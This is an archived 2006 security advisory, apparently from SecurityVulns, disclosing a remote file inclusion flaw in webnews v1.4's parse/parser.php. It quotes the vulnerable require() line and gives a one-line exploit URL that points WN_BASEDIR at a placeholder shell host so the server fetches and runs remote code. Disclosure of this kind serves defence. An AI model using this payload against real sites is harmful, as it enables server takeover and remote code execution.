webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

2006-09-27T00:00:00
ID SECURITYVULNS:DOC:14437
Type securityvulns
Reporter Securityvulns
Modified 2006-09-27T00:00:00

Description

==============================================================================================

webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

===============================================================================================

Critical Level : Dangerous

Version : v1.4

================================================================================================

Bug in : parse/parser.php

Vlu Code :

--------------------------------

require($WN_BASEDIR."/parse/parser.php");

================================================================================================

Exploit :

--------------------------------

htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM

================================================================================================

Discoverd By : ThE-WoLf-KsA

Conatact : the-wolf-ksa[at]hotmail.com

XP10_hackEr Team

WWW.XP10.COM

==================================================================================================


Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/